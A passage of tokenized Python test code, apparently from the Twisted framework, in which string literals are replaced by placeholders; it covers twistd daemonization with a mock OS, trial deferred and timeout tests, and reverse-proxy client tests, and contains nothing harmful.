<EOL> if syslog is None : <EOL> test_getLogObserverSyslog . skip = "<STR_LIT>" <EOL> class DaemonizeTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . mockos = MockOS ( ) <EOL> self . config = twistd . ServerOptions ( ) <EOL> self . patch ( _twistd_unix , '<STR_LIT>' , self . mockos ) <EOL> self . runner = _twistd_unix . UnixApplicationRunner ( self . config ) <EOL> self . runner . application = service . Application ( "<STR_LIT>" ) <EOL> self . runner . oldstdout = sys . stdout <EOL> self . runner . oldstderr = sys . stderr <EOL> self . runner . startReactor = lambda * args : None <EOL> def test_success ( self ) : <EOL> """<STR_LIT>""" <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . runner . postApplication ( ) <EOL> self . assertEqual ( <EOL> self . mockos . actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , True ) , ( '<STR_LIT>' , - <NUM_LIT:2> , '<STR_LIT:0>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . closed , [ - <NUM_LIT:3> , - <NUM_LIT:2> ] ) <EOL> def test_successInParent ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mockos . child = False <EOL> self . mockos . readData = "<STR_LIT:0>" <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . assertRaises ( SystemError , self . runner . postApplication ) <EOL> self . assertEqual ( <EOL> self . mockos . actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT:1> , <NUM_LIT:100> ) , ( '<STR_LIT>' , <NUM_LIT:0> ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . closed , [ - <NUM_LIT:1> ] ) <EOL> def test_successEINTR ( self ) : <EOL> """<STR_LIT>""" <EOL> written = [ ] <EOL> def raisingWrite ( fd , data ) : <EOL> written . append ( ( fd , data ) ) <EOL> if len ( written ) == <NUM_LIT:1> : <EOL> raise IOError ( errno . EINTR ) <EOL> self . mockos . write = raisingWrite <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . runner . postApplication ( ) <EOL> self . assertEqual ( <EOL> self . mockos . actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , True ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . closed , [ - <NUM_LIT:3> , - <NUM_LIT:2> ] ) <EOL> self . assertEqual ( [ ( - <NUM_LIT:2> , '<STR_LIT:0>' ) , ( - <NUM_LIT:2> , '<STR_LIT:0>' ) ] , written ) <EOL> def test_successInParentEINTR ( self ) : <EOL> """<STR_LIT>""" <EOL> read = [ ] <EOL> def raisingRead ( fd , size ) : <EOL> read . append ( ( fd , size ) ) <EOL> if len ( read ) == <NUM_LIT:1> : <EOL> raise IOError ( errno . EINTR ) <EOL> return "<STR_LIT:0>" <EOL> self . mockos . read = raisingRead <EOL> self . mockos . child = False <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . assertRaises ( SystemError , self . runner . postApplication ) <EOL> self . assertEqual ( <EOL> self . mockos . actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:0> ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . closed , [ - <NUM_LIT:1> ] ) <EOL> self . assertEqual ( [ ( - <NUM_LIT:1> , <NUM_LIT:100> ) , ( - <NUM_LIT:1> , <NUM_LIT:100> ) ] , read ) <EOL> def test_error ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakeService ( service . Service ) : <EOL> def startService ( self ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> errorService = FakeService ( ) <EOL> errorService . setServiceParent ( self . runner . application ) <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . assertRaises ( RuntimeError , self . runner . postApplication ) <EOL> self . assertEqual ( <EOL> self . mockos . actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , True ) , ( '<STR_LIT>' , - <NUM_LIT:2> , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . closed , [ - <NUM_LIT:3> , - <NUM_LIT:2> ] ) <EOL> def test_errorInParent ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mockos . child = False <EOL> self . mockos . readData = "<STR_LIT>" <EOL> errorIO = NativeStringIO ( ) <EOL> self . patch ( sys , '<STR_LIT>' , errorIO ) <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . assertRaises ( SystemError , self . runner . postApplication ) <EOL> self . assertEqual ( <EOL> errorIO . getvalue ( ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> self . mockos . actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , - <NUM_LIT:1> , <NUM_LIT:100> ) , ( '<STR_LIT>' , <NUM_LIT:1> ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . closed , [ - <NUM_LIT:1> ] ) <EOL> def test_errorMessageTruncated ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakeService ( service . Service ) : <EOL> def startService ( self ) : <EOL> raise RuntimeError ( "<STR_LIT:x>" * <NUM_LIT:200> ) <EOL> errorService = FakeService ( ) <EOL> errorService . setServiceParent ( self . runner . application ) <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . assertRaises ( RuntimeError , self . runner . postApplication ) <EOL> self . assertEqual ( <EOL> self . mockos . actions , <EOL> [ ( '<STR_LIT>' , '<STR_LIT:.>' ) , ( '<STR_LIT>' , <NUM_LIT> ) , ( '<STR_LIT>' , True ) , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , True ) , ( '<STR_LIT>' , - <NUM_LIT:2> , '<STR_LIT>' + '<STR_LIT:x>' * <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> self . assertEqual ( self . mockos . closed , [ - <NUM_LIT:3> , - <NUM_LIT:2> ] ) <EOL> def test_hooksCalled ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = FakeDaemonizingReactor ( ) <EOL> self . runner . daemonize ( reactor ) <EOL> self . assertTrue ( reactor . _beforeDaemonizeCalled ) <EOL> self . assertTrue ( reactor . _afterDaemonizeCalled ) <EOL> def test_hooksNotCalled ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = FakeNonDaemonizingReactor ( ) <EOL> self . runner . daemonize ( reactor ) <EOL> self . assertFalse ( reactor . _beforeDaemonizeCalled ) <EOL> self . assertFalse ( reactor . _afterDaemonizeCalled ) <EOL> if _twistd_unix is None : <EOL> DaemonizeTests . skip = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> import unittest as pyunit <EOL> from twisted . internet import defer <EOL> from twisted . trial import unittest , reporter <EOL> from twisted . trial import util <EOL> from twisted . trial . test import detests <EOL> class SetUpTests ( unittest . TestCase ) : <EOL> def _loadSuite ( self , klass ) : <EOL> loader = pyunit . TestLoader ( ) <EOL> r = reporter . TestResult ( ) <EOL> s = loader . loadTestsFromTestCase ( klass ) <EOL> return r , s <EOL> def test_success ( self ) : <EOL> result , suite = self . _loadSuite ( detests . DeferredSetUpOK ) <EOL> suite ( result ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> def test_fail ( self ) : <EOL> self . assertFalse ( detests . DeferredSetUpFail . testCalled ) <EOL> result , suite = self . _loadSuite ( detests . DeferredSetUpFail ) <EOL> suite ( result ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . assertFalse ( detests . DeferredSetUpFail . testCalled ) <EOL> def test_callbackFail ( self ) : <EOL> self . assertFalse ( detests . DeferredSetUpCallbackFail . testCalled ) <EOL> result , suite = self . _loadSuite ( detests . DeferredSetUpCallbackFail ) <EOL> suite ( result ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . assertFalse ( detests . DeferredSetUpCallbackFail . testCalled ) <EOL> def test_error ( self ) : <EOL> self . assertFalse ( detests . DeferredSetUpError . testCalled ) <EOL> result , suite = self . _loadSuite ( detests . DeferredSetUpError ) <EOL> suite ( result ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . assertFalse ( detests . DeferredSetUpError . testCalled ) <EOL> def test_skip ( self ) : <EOL> self . assertFalse ( detests . DeferredSetUpSkip . testCalled ) <EOL> result , suite = self . _loadSuite ( detests . DeferredSetUpSkip ) <EOL> suite ( result ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . skips ) , <NUM_LIT:1> ) <EOL> self . assertFalse ( detests . DeferredSetUpSkip . testCalled ) <EOL> class NeverFireTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . _oldTimeout = util . DEFAULT_TIMEOUT_DURATION <EOL> util . DEFAULT_TIMEOUT_DURATION = <NUM_LIT:0.1> <EOL> def tearDown ( self ) : <EOL> util . DEFAULT_TIMEOUT_DURATION = self . _oldTimeout <EOL> def _loadSuite ( self , klass ) : <EOL> loader = pyunit . TestLoader ( ) <EOL> r = reporter . TestResult ( ) <EOL> s = loader . loadTestsFromTestCase ( klass ) <EOL> return r , s <EOL> def test_setUp ( self ) : <EOL> self . assertFalse ( detests . DeferredSetUpNeverFire . testCalled ) <EOL> result , suite = self . _loadSuite ( detests . DeferredSetUpNeverFire ) <EOL> suite ( result ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . assertFalse ( detests . DeferredSetUpNeverFire . testCalled ) <EOL> self . assertTrue ( result . errors [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . check ( defer . TimeoutError ) ) <EOL> class TestTester ( unittest . TestCase ) : <EOL> def getTest ( self , name ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def runTest ( self , name ) : <EOL> result = reporter . TestResult ( ) <EOL> self . getTest ( name ) . run ( result ) <EOL> return result <EOL> class DeferredTests ( TestTester ) : <EOL> def getTest ( self , name ) : <EOL> return detests . DeferredTests ( name ) <EOL> def test_pass ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> def test_passGenerated ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertTrue ( detests . DeferredTests . touched ) <EOL> test_passGenerated . supress = [ util . suppress ( <EOL> message = "<STR_LIT>" ) ] <EOL> def test_passInlineCallbacks ( self ) : <EOL> """<STR_LIT>""" <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertTrue ( detests . DeferredTests . touched ) <EOL> def test_fail ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:1> ) <EOL> def test_failureInCallback ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:1> ) <EOL> def test_errorInCallback ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> def test_skip ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . skips ) , <NUM_LIT:1> ) <EOL> self . assertFalse ( detests . DeferredTests . touched ) <EOL> def test_todo ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . failures ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( result . expectedFailures ) , <NUM_LIT:1> ) <EOL> def test_thread ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertTrue ( result . wasSuccessful ( ) , result . errors ) <EOL> class TimeoutTests ( TestTester ) : <EOL> def getTest ( self , name ) : <EOL> return detests . TimeoutTests ( name ) <EOL> def _wasTimeout ( self , error ) : <EOL> self . assertEqual ( error . check ( defer . TimeoutError ) , <EOL> defer . TimeoutError ) <EOL> def test_pass ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> def test_passDefault ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> def test_timeout ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . _wasTimeout ( result . errors [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> def test_timeoutZero ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . _wasTimeout ( result . errors [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> def test_skip ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . skips ) , <NUM_LIT:1> ) <EOL> def test_todo ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( result . expectedFailures ) , <NUM_LIT:1> ) <EOL> self . _wasTimeout ( result . expectedFailures [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> def test_errorPropagation ( self ) : <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . _wasTimeout ( detests . TimeoutTests . timedOut ) <EOL> def test_classTimeout ( self ) : <EOL> loader = pyunit . TestLoader ( ) <EOL> suite = loader . loadTestsFromTestCase ( detests . TestClassTimeoutAttribute ) <EOL> result = reporter . TestResult ( ) <EOL> suite . run ( result ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . _wasTimeout ( result . errors [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> def test_callbackReturnsNonCallingDeferred ( self ) : <EOL> from twisted . internet import reactor <EOL> call = reactor . callLater ( <NUM_LIT:2> , reactor . crash ) <EOL> result = self . runTest ( '<STR_LIT>' ) <EOL> if call . active ( ) : <EOL> call . cancel ( ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . _wasTimeout ( result . errors [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> del TestTester </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division <EOL> from twisted . web import static <EOL> class Test ( static . Data ) : <EOL> isLeaf = True <EOL> def __init__ ( self ) : <EOL> static . Data . __init__ ( <EOL> self , <EOL> b"""<STR_LIT>""" , <EOL> "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from twisted . trial . unittest import TestCase <EOL> from twisted . test . proto_helpers import StringTransportWithDisconnection <EOL> from twisted . test . proto_helpers import MemoryReactor <EOL> from twisted . web . resource import Resource <EOL> from twisted . web . server import Site <EOL> from twisted . web . proxy import ReverseProxyResource , ProxyClientFactory <EOL> from twisted . web . proxy import ProxyClient , ProxyRequest , ReverseProxyRequest <EOL> from twisted . web . test . test_web import DummyRequest <EOL> class ReverseProxyResourceTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def _testRender ( self , uri , expectedURI ) : <EOL> """<STR_LIT>""" <EOL> root = Resource ( ) <EOL> reactor = MemoryReactor ( ) <EOL> resource = ReverseProxyResource ( u"<STR_LIT:127.0.0.1>" , <NUM_LIT> , b"<STR_LIT>" , reactor ) <EOL> root . putChild ( b'<STR_LIT:index>' , resource ) <EOL> site = Site ( root ) <EOL> transport = StringTransportWithDisconnection ( ) <EOL> channel = site . buildProtocol ( None ) <EOL> channel . makeConnection ( transport ) <EOL> self . addCleanup ( channel . connectionLost , None ) <EOL> channel . dataReceived ( b"<STR_LIT>" + <EOL> uri + <EOL> b"<STR_LIT>" ) <EOL> self . assertEqual ( len ( reactor . tcpClients ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , u"<STR_LIT:127.0.0.1>" ) <EOL> self . assertEqual ( reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> factory = reactor . tcpClients [ <NUM_LIT:0> ] [ <NUM_LIT:2> ] <EOL> self . assertIsInstance ( factory , ProxyClientFactory ) <EOL> self . assertEqual ( factory . rest , expectedURI ) <EOL> self . assertEqual ( factory . headers [ b"<STR_LIT:host>" ] , b"<STR_LIT>" ) <EOL> def test_render ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testRender ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> def test_renderWithQuery ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testRender ( b"<STR_LIT>" , b"<STR_LIT>" ) <EOL> def test_getChild ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = MemoryReactor ( ) <EOL> resource = ReverseProxyResource ( u"<STR_LIT:127.0.0.1>" , <NUM_LIT> , b"<STR_LIT>" , reactor ) <EOL> child = resource . getChild ( b'<STR_LIT:foo>' , None ) <EOL> self . assertIsInstance ( child , ReverseProxyResource ) <EOL> self . assertEqual ( child . path , b"<STR_LIT>" ) <EOL> self . assertEqual ( child . port , <NUM_LIT> ) <EOL> self . assertEqual ( child . host , u"<STR_LIT:127.0.0.1>" ) <EOL> self . assertIdentical ( child . reactor , resource . reactor ) <EOL> def test_getChildWithSpecial ( self ) : <EOL> """<STR_LIT>""" <EOL> resource = ReverseProxyResource ( u"<STR_LIT:127.0.0.1>" , <NUM_LIT> , b"<STR_LIT>" ) <EOL> child = resource . getChild ( b'<STR_LIT>' , None ) <EOL> self . assertEqual ( child . path , b"<STR_LIT>" ) <EOL> class DummyChannel ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , transport ) : <EOL> """<STR_LIT>""" <EOL> self . transport = transport <EOL> self . lostReason = None <EOL> def connectionLost ( self , reason ) : <EOL> """<STR_LIT>""" <EOL> self . lostReason = reason <EOL> class ProxyClientTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def _parseOutHeaders ( self , content ) : <EOL> """<STR_LIT>""" <EOL> headers , body = content . split ( b'<STR_LIT>' ) <EOL> headers = headers . split ( b'<STR_LIT:\r\n>' ) <EOL> requestLine = headers . pop ( <NUM_LIT:0> ) <EOL> return ( <EOL> requestLine , dict ( header . split ( b'<STR_LIT>' ) for header in headers ) , body ) <EOL> def makeRequest ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return DummyRequest ( path ) <EOL> def makeProxyClient ( self , request , method = b"<STR_LIT:GET>" , headers = None , <EOL> requestBody = b"<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> if headers is None : <EOL> headers = { b"<STR_LIT>" : b"<STR_LIT>" } <EOL> path = b'<STR_LIT:/>' + request . postpath <EOL> return ProxyClient ( <EOL> method , path , b'<STR_LIT>' , headers , requestBody , request ) <EOL> def connectProxy ( self , proxyClient ) : <EOL> """<STR_LIT>""" <EOL> clientTransport = StringTransportWithDisconnection ( ) <EOL> clientTransport . protocol = proxyClient <EOL> proxyClient . makeConnection ( clientTransport ) <EOL> return clientTransport <EOL> def assertForwardsHeaders ( self , proxyClient , requestLine , headers ) : <EOL> """<STR_LIT>""" <EOL> self . connectProxy ( proxyClient ) <EOL> requestContent = proxyClient . transport . value ( ) <EOL> receivedLine , receivedHeaders , body = self . _parseOutHeaders ( <EOL> requestContent ) <EOL> self . assertEqual ( receivedLine , requestLine ) <EOL> self . assertEqual ( receivedHeaders , headers ) <EOL> return body <EOL> def makeResponseBytes ( self , code , message , headers , body ) : <EOL> lines = [ b"<STR_LIT>" + str ( code ) . encode ( '<STR_LIT:ascii>' ) + b'<STR_LIT:U+0020>' + message ] <EOL> for header , values in headers : <EOL> for value in values : <EOL> lines . append ( header + b'<STR_LIT>' + value ) <EOL> lines . extend ( [ b'<STR_LIT>' , body ] ) <EOL> return b'<STR_LIT:\r\n>' . join ( lines ) <EOL> def assertForwardsResponse ( self , request , code , message , headers , body ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( request . responseCode , code ) <EOL> self . assertEqual ( request . responseMessage , message ) <EOL> receivedHeaders = list ( request . responseHeaders . getAllRawHeaders ( ) ) <EOL> receivedHeaders . sort ( ) <EOL> expectedHeaders = headers [ : ] <EOL> expectedHeaders . sort ( ) <EOL> self . assertEqual ( receivedHeaders , expectedHeaders ) <EOL> self . assertEqual ( b'<STR_LIT>' . join ( request . written ) , body ) <EOL> def _testDataForward ( self , code , message , headers , body , method = b"<STR_LIT:GET>" , <EOL> requestBody = b"<STR_LIT>" , loseConnection = True ) : <EOL> """<STR_LIT>""" <EOL> request = self . makeRequest ( b'<STR_LIT:foo>' ) <EOL> client = self . makeProxyClient ( <EOL> request , method , { b'<STR_LIT>' : b'<STR_LIT>' } , requestBody ) <EOL> receivedBody = self . assertForwardsHeaders ( <EOL> client , method + b'<STR_LIT>' , <EOL> { b'<STR_LIT>' : b'<STR_LIT>' , b'<STR_LIT>' : b'<STR_LIT>' } ) <EOL> self . assertEqual ( receivedBody , requestBody ) <EOL> client . dataReceived ( <EOL> self . makeResponseBytes ( code , message , headers , body ) ) <EOL> self . assertForwardsResponse ( request , code , message , headers , body ) <EOL> if loseConnection : <EOL> client . transport . loseConnection ( ) <EOL> self . assertFalse ( client . transport . connected ) <EOL> self . assertEqual ( request . finished , <NUM_LIT:1> ) <EOL> def test_forward ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testDataForward ( <EOL> <NUM_LIT:200> , b"<STR_LIT:OK>" , [ ( b"<STR_LIT>" , [ b"<STR_LIT:bar>" , b"<STR_LIT>" ] ) ] , b"<STR_LIT>" ) <EOL> def test_postData ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testDataForward ( <EOL> <NUM_LIT:200> , b"<STR_LIT:OK>" , [ ( b"<STR_LIT>" , [ b"<STR_LIT:bar>" ] ) ] , b"<STR_LIT>" , b"<STR_LIT:POST>" , b"<STR_LIT>" ) <EOL> def test_statusWithMessage ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _testDataForward ( <EOL> <NUM_LIT> , b"<STR_LIT>" , [ ] , b"<STR_LIT>" ) <EOL> def test_contentLength ( self ) : <EOL> """<STR_LIT>""" <EOL> data = b"<STR_LIT>" <EOL> return self . _testDataForward ( <EOL> <NUM_LIT:200> , <EOL> b"<STR_LIT:OK>" , <EOL> [ ( b"<STR_LIT>" , [ str ( len ( data ) ) . encode ( '<STR_LIT:ascii>' ) ] ) ] , <EOL> data ) <EOL> def test_losesConnection ( self ) : <EOL> """<STR_LIT>""" <EOL> data = b"<STR_LIT>" <EOL> return self . _testDataForward ( <EOL> <NUM_LIT:200> , <EOL> b"<STR_LIT:OK>" , <EOL> [ ( b"<STR_LIT>" , [ str ( len ( data ) ) . encode ( '<STR_LIT:ascii>' ) ] ) ] , <EOL> data , <EOL> loseConnection = False ) <EOL> def test_headersCleanups ( self ) : <EOL> """<STR_LIT>""" <EOL> client = ProxyClient ( b'<STR_LIT:GET>' , b'<STR_LIT>' , b'<STR_LIT>' , <EOL> { b"<STR_LIT>" : b"<STR_LIT>" , b"<STR_LIT>" : b"<STR_LIT:foo>" } , b'<STR_LIT>' , None ) <EOL> self . assertEqual ( client . headers , <EOL> { b"<STR_LIT>" : b"<STR_LIT>" , b"<STR_LIT>" : b"<STR_LIT>" } ) <EOL> def test_keepaliveNotForwarded ( self ) : <EOL> """<STR_LIT>""" <EOL> headers = { <EOL> b"<STR_LIT>" : b"<STR_LIT>" , <EOL> b'<STR_LIT>' : b'<STR_LIT>' , <EOL> b'<STR_LIT>' : b'<STR_LIT>' , <EOL> } <EOL> expectedHeaders = headers . copy ( ) <EOL> expectedHeaders [ b'<STR_LIT>' ] = b'<STR_LIT>' <EOL> del expectedHeaders [ b'<STR_LIT>' ] <EOL> client = ProxyClient ( b'<STR_LIT:GET>' , b'<STR_LIT>' , b'<STR_LIT>' , headers , b'<STR_LIT>' , None ) <EOL> self . assertForwardsHeaders ( <EOL> client , b'<STR_LIT>' , expectedHeaders ) <EOL> def test_defaultHeadersOverridden ( self ) : <EOL> """<STR_LIT>""" <EOL> request = self . makeRequest ( b'<STR_LIT:foo>' ) <EOL> request . responseHeaders . setRawHeaders ( b'<STR_LIT>' , [ b'<STR_LIT>' ] ) <EOL> request . responseHeaders . setRawHeaders ( b'<STR_LIT:date>' , [ b'<STR_LIT>' ] ) <EOL> request . responseHeaders . setRawHeaders ( b'<STR_LIT>' , [ b"<STR_LIT>" ] ) <EOL> client = self . makeProxyClient ( request , headers = { b'<STR_LIT>' : b'<STR_LIT>' } ) <EOL> self . connectProxy ( client ) <EOL> headers = { <EOL> b'<STR_LIT>' : [ b'<STR_LIT:bar>' ] , <EOL> b'<STR_LIT>' : [ b'<STR_LIT>' ] , <EOL> b'<STR_LIT:Content-Type>' : [ b'<STR_LIT>' ] , <EOL> } <EOL> client . dataReceived ( <EOL> self . makeResponseBytes ( <NUM_LIT:200> , b"<STR_LIT:OK>" , headers . items ( ) , b'<STR_LIT>' ) ) <EOL> self . assertForwardsResponse ( <EOL> request , <NUM_LIT:200> , b'<STR_LIT:OK>' , list ( headers . items ( ) ) , b'<STR_LIT>' ) <EOL> class ProxyClientFactoryTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_connectionFailed ( self ) : <EOL> """<STR_LIT>""" <EOL> request = DummyRequest ( [ b'<STR_LIT:foo>' ] ) <EOL> factory = ProxyClientFactory ( b'<STR_LIT:GET>' , b'<STR_LIT>' , b'<STR_LIT>' , <EOL> { b"<STR_LIT>" : b"<STR_LIT>" } , '<STR_LIT>' , request ) <EOL> factory . clientConnectionFailed ( None , None ) <EOL> self . assertEqual ( request . responseCode , 